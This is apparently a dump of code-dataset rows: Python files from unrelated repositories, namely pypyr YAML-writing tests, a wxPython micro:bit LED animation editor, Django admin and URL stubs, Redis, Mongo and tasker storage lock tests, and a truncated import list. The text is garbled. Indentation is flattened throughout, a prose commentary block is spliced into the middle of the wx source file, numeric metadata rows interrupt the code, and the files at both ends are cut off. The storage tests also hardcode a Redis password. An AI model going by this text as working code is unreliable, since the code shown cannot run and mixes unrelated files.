' - 3\n'
' - - a\n'
' - b\n'
' - c\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_empty_payload(mock_path):
"""Empty payload write empty file."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': ''
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['path'] == '/arb/blah'
assert context['fileWriteYaml']['payload'] == ''
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == "''\n"
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_none_payload(mock_path):
"""None payload write empty file."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': None
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['path'] == '/arb/blah'
assert context['fileWriteYaml']['payload'] is None
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines + indents are where they should be
assert out_text.getvalue() == "null\n...\n"
# File: configuration/__init__.py | Repo: jameshi16/TypeSound | License: MIT
from .JSONConfiguration import JSONConfiguration
from .ConfigurationSchemeV1 import ConfigurationSchemeV1
# File: unet3d/models/pytorch/fcn/__init__.py | Repo: Crush18/3DUnetCNN | License: MIT
from .fcn import FCN
# File: MyProject1MyFrame1.py | Repo: SaitoYutaka/microbitAnim | License: MIT
"""Subclass of MyFrame1, which is generated by wxFormBuilder."""
import wx
import microbitAnim
import json
# Implementing MyFrame1
class MyProject1MyFrame1( microbitAnim.MyFrame1 ):
def __init__( self, parent ):
microbitAnim.MyFrame1.__init__( self, parent )
# Handlers for MyFrame1 events.
def onButton00Click( self, event ):
if (self.m_button00.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button00.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button00.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton01Click( self, event ):
if (self.m_button01.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button01.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button01.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton02Click( self, event ):
if (self.m_button02.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button02.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button02.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton03Click( self, event ):
if (self.m_button03.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button03.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button03.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton04Click( self, event ):
if (self.m_button04.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button04.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button04.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton10Click( self, event ):
if (self.m_button10.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button10.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button10.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton11Click( self, event ):
if (self.m_button11.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button11.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button11.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton12Click( self, event ):
if (self.m_button12.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button12.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button12.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton13Click( self, event ):
if (self.m_button13.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button13.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button13.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton14Click( self, event ):
if (self.m_button14.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button14.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button14.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton20Click( self, event ):
if (self.m_button20.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button20.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button20.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton21Click( self, event ):
if (self.m_button21.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button21.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button21.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton22Click( self, event ):
if (self.m_button22.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button22.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button22.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton23Click( self, event ):
if (self.m_button23.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button23.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button23.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton24Click( self, event ):
if (self.m_button24.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button24.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button24.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton30Click( self, event ):
if (self.m_button30.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button30.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button30.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton31Click( self, event ):
if (self.m_button31.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button31.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button31.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton32Click( self, event ):
if (self.m_button32.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button32.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button32.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton33Click( self, event ):
if (self.m_button33.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button33.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button33.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton34Click( self, event ):
if (self.m_button34.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button34.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button34.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
###
def onButton40Click( self, event ):
if (self.m_button40.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button40.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button40.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton41Click( self, event ):
if (self.m_button41.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button41.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button41.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton42Click( self, event ):
if (self.m_button42.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button42.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button42.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton43Click( self, event ):
if (self.m_button43.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button43.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button43.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
def onButton44Click( self, event ):
if (self.m_button44.BackgroundColour == wx.Colour( 255, 0, 0 )):
self.m_button44.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
else:
self.m_button44.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
event.Skip()
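The 25 click handlers above and the per-cell checks in `getDisplayString` all apply one rule per grid cell: toggle between red and black, and render lit cells as `'6'`. A minimal wx-free sketch of that rule (the `LedGrid` class and its method names are hypothetical, not part of this project):

```python
RED = (255, 0, 0)
BLACK = (0, 0, 0)

class LedGrid:
    """Pure-Python stand-in for the 5x5 button grid (no wx required)."""
    def __init__(self):
        self.colours = [[BLACK] * 5 for _ in range(5)]

    def toggle(self, row, col):
        # Same logic as every onButtonXYClick handler: red <-> black.
        current = self.colours[row][col]
        self.colours[row][col] = BLACK if current == RED else RED

    def display_string(self):
        # Same format as getDisplayString: '6' for lit, '0' for dark,
        # rows joined by ':'.
        return ':'.join(
            ''.join('6' if cell == RED else '0' for cell in row)
            for row in self.colours
        )
```

In the real frame, the same idea could bind every `m_buttonXY` to one shared handler that derives `(row, col)` from the event source, instead of keeping 25 copies of the toggle.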
def getDisplayString( self ):
s = [
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0'],
['0','0','0','0','0']
]
        for row in range(5):
            for col in range(5):
                button = getattr(self, 'm_button%d%d' % (row, col))
                if button.BackgroundColour == wx.Colour( 255, 0, 0 ):
                    s[row][col] = '6'
        dispStr = ':'.join(''.join(row) for row in s)
return dispStr
def OnMenuSaveSelect( self, event ):
        with wx.FileDialog(self, "Save JSON file", wildcard="JSON files (*.json)|*.json",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'w') as file:
s = self.getDisplayString()
print(s)
d = {}
d["anim01"] = s
str_ = json.dumps(d)
file.write(str_)
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
    def OnMenuQuitSelect( self, event ):
        self.Close()  # close the frame cleanly instead of the interactive-only quit()
def OnMenuOpenSelect( self, event):
        with wx.FileDialog(self, "Open JSON file", wildcard="JSON files (*.json)|*.json",
style=wx.FD_OPEN ) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'r') as f:
data = json.load(f)
                    i = data["anim01"].split(':')
                    # getDisplayString marks lit pixels with '6' (not '1'), so
                    # treat any non-'0' brightness as lit when restoring the grid.
                    for row in range(5):
                        for col in range(5):
                            button = getattr(self, 'm_button%d%d' % (row, col))
                            if i[row][col] != '0':
                                button.SetBackgroundColour(wx.Colour( 255, 0, 0 ))
                            else:
                                button.SetBackgroundColour(wx.Colour( 0, 0, 0 ))
except IOError:
                wx.LogError("Cannot open data in file '%s'." % pathname)
def OnExportPythonSelect( self, event ):
anim = self.getDisplayString()
tmp = anim.split(":")
anim00 = tmp[0] + ":" + tmp[1] + ":" + tmp[2] + ":" + tmp[3] + ":" + tmp[4]
anim01 = "00000" + ":" + tmp[0] + ":" + tmp[1] + ":" + tmp[2] + ":" + tmp[3]
anim02 = "00000" + ":" + "00000" + ":" + tmp[0] + ":" + tmp[1] + ":" + tmp[2]
anim03 = "00000" + ":" + "00000" + ":" + "00000" + ":" + tmp[0] + ":" + tmp[1]
anim04 = "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + tmp[0]
anim05 = "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim06 = tmp[4] + ":" + "00000" + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim07 = tmp[3] + ":" + tmp[4] + ":" + "00000" + ":" + "00000" + ":" + "00000"
anim08 = tmp[2] + ":" + tmp[3] + ":" + tmp[4] + ":" + "00000" + ":" + "00000"
anim09 = tmp[1] + ":" + tmp[2] + ":" + tmp[3] + ":" + tmp[4] + ":" + "00000"
anim00 = "anim00 = Image(\"" + anim00 + "\")"
anim01 = "anim01 = Image(\"" + anim01 + "\")"
anim02 = "anim02 = Image(\"" + anim02 + "\")"
anim03 = "anim03 = Image(\"" + anim03 + "\")"
anim04 = "anim04 = Image(\"" + anim04 + "\")"
anim05 = "anim05 = Image(\"" + anim05 + "\")"
anim06 = "anim06 = Image(\"" + anim06 + "\")"
anim07 = "anim07 = Image(\"" + anim07 + "\")"
anim08 = "anim08 = Image(\"" + anim08 + "\")"
anim09 = "anim09 = Image(\"" + anim09 + "\")"
print("from microbit import *")
print(anim00)
print(anim01)
print(anim02)
print(anim03)
print(anim04)
print(anim05)
print("anim = [anim00, anim01, anim02, anim03, anim04, anim05]")
print("display.show(anim, delay=200)")
with wx.FileDialog(self, "Export Python code", wildcard="Python files (*.py)|*.py",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'w') as file:
file.writelines("from microbit import *\n")
file.writelines(anim00 + "\n")
file.writelines(anim01 + "\n")
file.writelines(anim02 + "\n")
file.writelines(anim03 + "\n")
file.writelines(anim04 + "\n")
file.writelines(anim05 + "\n")
file.writelines(anim06 + "\n")
file.writelines(anim07 + "\n")
file.writelines(anim08 + "\n")
file.writelines(anim09 + "\n")
file.writelines("anim = [\n")
file.writelines(" anim00, anim01, anim02, anim03, anim04, anim05, anim06,\n")
file.writelines(" anim07, anim08, anim09]\n")
file.writelines("while True:\n")
file.writelines(" display.show(anim, delay=200)\n")
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
| 49.07888 | 100 | 0.541736 | 2,371 | 19,288 | 4.335302 | 0.067904 | 0.044168 | 0.107014 | 0.116743 | 0.821481 | 0.776827 | 0.756299 | 0.748906 | 0.738982 | 0.463664 | 0 | 0.112478 | 0.291995 | 19,288 | 392 | 101 | 49.204082 | 0.640231 | 0.005755 | 0 | 0.374252 | 1 | 0 | 0.056582 | 0 | 0.01497 | 0 | 0 | 0 | 0 | 1 | 0.092814 | false | 0 | 0.01497 | 0 | 0.122754 | 0.02994 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
63f2572c889a9262373f6227159d791861867be3 | 200 | py | Python | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | 1 | 2021-11-13T11:35:40.000Z | 2021-11-13T11:35:40.000Z | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | null | null | null | accounts/admin.py | yamansener199/CS308-Project | 11b915c891494278db73dede565554704cbc8ae2 | [
"Apache-2.0"
] | 2 | 2021-11-11T14:22:38.000Z | 2021-11-13T11:35:42.000Z | from django.contrib import admin
from django.contrib.auth.models import User
from accounts.forms import Patient
# Register your models here.
from .models import *
admin.site.register(Patient)
| 25 | 44 | 0.785 | 28 | 200 | 5.607143 | 0.535714 | 0.127389 | 0.216561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 200 | 7 | 45 | 28.571429 | 0.923529 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
63f9ed819e0173a27119dd7c42b177025d72f2a6 | 239 | py | Python | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | 1 | 2020-11-16T17:12:33.000Z | 2020-11-16T17:12:33.000Z | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | null | null | null | mapping/urls.py | eshandinesh/gis_based_crime_mapping | 72ced819cf2a2c74654773e9f9869279852feb91 | [
"MIT"
] | 1 | 2020-12-19T20:11:32.000Z | 2020-12-19T20:11:32.000Z | from django.conf.urls import include,url
from . import views
from django.conf.urls import *
from django.conf.urls.static import static
from django.conf import settings
urlpatterns =[
url(r'^home$', views.HOTSPOTS, name='home'),
]
| 23.9 | 48 | 0.740586 | 35 | 239 | 5.057143 | 0.428571 | 0.225989 | 0.316384 | 0.305085 | 0.271186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146444 | 239 | 9 | 49 | 26.555556 | 0.867647 | 0 | 0 | 0 | 0 | 0 | 0.041841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1209e5404f14ce7a79e611f2861564509550be74 | 36 | py | Python | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | 2 | 2019-03-26T16:32:59.000Z | 2019-11-19T09:46:14.000Z | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | 1 | 2021-12-13T20:22:47.000Z | 2021-12-13T20:22:47.000Z | api/resources/expression/datasets.py | armell/RNASEqTool | 88ee1011cd2597a04f5f7bfc811649ed17d40752 | [
"MIT"
] | null | null | null | from entities import entities as ent | 36 | 36 | 0.861111 | 6 | 36 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 36 | 1 | 36 | 36 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1245d03c5a78386498c2a54426e8fd13f1423f12 | 7,502 | py | Python | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/tests/test_storage.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | import unittest
import time
import threading
from .. import connector
from .. import storage
from .. import encoder
class StorageTestCase:
def test_lock_key(
self,
):
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
timer = threading.Timer(
interval=2.0,
function=self.storage.release_lock_key,
args=(
self.test_key,
),
)
timer.start()
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
time_acquired = time.time()
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
time_released = time.time()
lock_time = time_released - time_acquired
self.assertTrue(
expr=2.2 > lock_time > 1.9,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
timer = threading.Timer(
interval=2,
function=self.storage.release_lock_key,
args=(
self.test_key,
)
)
timer.start()
acquired = self.storage.acquire_lock_key(
name=self.test_key,
timeout=3,
)
self.assertTrue(
expr=acquired,
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
timeout=2,
)
self.assertFalse(
expr=acquired,
)
def test_functions(
self,
):
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
acquired = self.storage.acquire_lock_key(
name=self.test_key,
)
self.assertTrue(
expr=acquired,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second='locked',
)
self.storage.release_lock_key(
name=self.test_key,
)
lock_key_value = self.storage.get_key(
name=self.test_lock_key,
)
self.assertEqual(
first=lock_key_value,
second={},
)
class SingleMongoStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.mongo_connector = connector.mongo.Connector(
mongodb_uri='mongodb://localhost:27030/',
)
self.storage = storage.storage.Storage(
connector=self.mongo_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class SingleRedisStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis.Connector(
host='127.0.0.1',
port=6379,
password='e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
database=0,
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class RedisClusterSingleServerStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis_cluster.Connector(
nodes=[
{
'host': '127.0.0.1',
'port': 6379,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
]
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class RedisClusterMultipleServersStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.redis_connector = connector.redis_cluster.Connector(
nodes=[
{
'host': '127.0.0.1',
'port': 6379,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
{
'host': '127.0.0.1',
'port': 6380,
'password': 'e082ebf6c7fff3997c4bb1cb64d6bdecd0351fa270402d98d35acceef07c6b97',
'database': 0,
},
]
)
self.storage = storage.storage.Storage(
connector=self.redis_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
class TaskerServerStorageTestCase(
StorageTestCase,
unittest.TestCase,
):
def setUp(
self,
):
self.tasker_server_connector = connector.tasker.Connector(
host='127.0.0.1',
port=50001,
)
self.storage = storage.storage.Storage(
connector=self.tasker_server_connector,
encoder=encoder.encoder.Encoder(
compressor_name='dummy',
serializer_name='pickle',
),
)
self.test_key = 'test_key'
self.test_lock_key = '_storage_{key_name}_lock'.format(
key_name=self.test_key,
)
| 25.344595 | 99 | 0.522794 | 665 | 7,502 | 5.643609 | 0.108271 | 0.072742 | 0.064482 | 0.08793 | 0.843592 | 0.82867 | 0.82494 | 0.767386 | 0.767386 | 0.767386 | 0 | 0.043563 | 0.384964 | 7,502 | 295 | 100 | 25.430508 | 0.769831 | 0 | 0 | 0.65019 | 0 | 0 | 0.084244 | 0.053586 | 0 | 0 | 0 | 0 | 0.053232 | 1 | 0.026616 | false | 0.015209 | 0.022814 | 0 | 0.072243 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
124ac3cd15b44f8df8f3c9e9ebb2e5f46cc648ba | 87 | py | Python | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | qmldataset/noise_profiles/__init__.py | rajibchakravorty/QDataSet | 8eb21b8c7dad5654358021dd73b93ab90443f6d0 | [
"MIT"
] | null | null | null | """Module to define noise profiles
"""
from .create_noise import create_noise_profile
| 17.4 | 46 | 0.793103 | 12 | 87 | 5.5 | 0.75 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 4 | 47 | 21.75 | 0.868421 | 0.356322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
124cccf419d717eaab8e96f2e5a6f446359a8d82 | 694 | py | Python | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | imapmover/util.py | nickovs/imapmover | db999ac66829161ccffffe668e2a50b7e811b502 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Nicko van Someren
#
# Licensed under the Apache License, Version 2.0 (the "License")
# See the LICENSE.txt file for details
# SPDX-License-Identifier: Apache-2.0
"""Utility functions and classes"""
class DummyProgress:
"""A dummy stub when progress indication is not needed"""
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
return False
def set_description(self, *args, **kwargs):
pass
def reset(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def set_postfix_str(self, *args, **kwargs):
pass
| 21.030303 | 64 | 0.631124 | 88 | 694 | 4.806818 | 0.579545 | 0.113475 | 0.198582 | 0.212766 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015414 | 0.252161 | 694 | 32 | 65 | 21.6875 | 0.799615 | 0.361671 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0.333333 | 0 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
12723950b39084540d92ed7466eda23227e72fe6 | 51,529 | py | Python | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | main.py | Jipje/local_smart_grid_simulation | ca11bcf349c51bd24e0a8dffd21ca82e35c8255a | [
"MIT"
] | null | null | null | from csv import reader
import os
import random
import datetime as dt
import dateutil.tz
import pandas as pd
from pandas import NaT
from environment.NetworkEnvironment import NetworkEnvironment
from environment.TotalNetworkCapacityTracker import TotalNetworkCapacityTracker
from helper_objects.congestion_helper.month_congestion_size_and_timer import get_month_congestion_timings
from helper_objects.strategies.CsvStrategy import CsvStrategy
from helper_objects.strategies.DischargeUntilStrategy import DischargeUntilStrategy
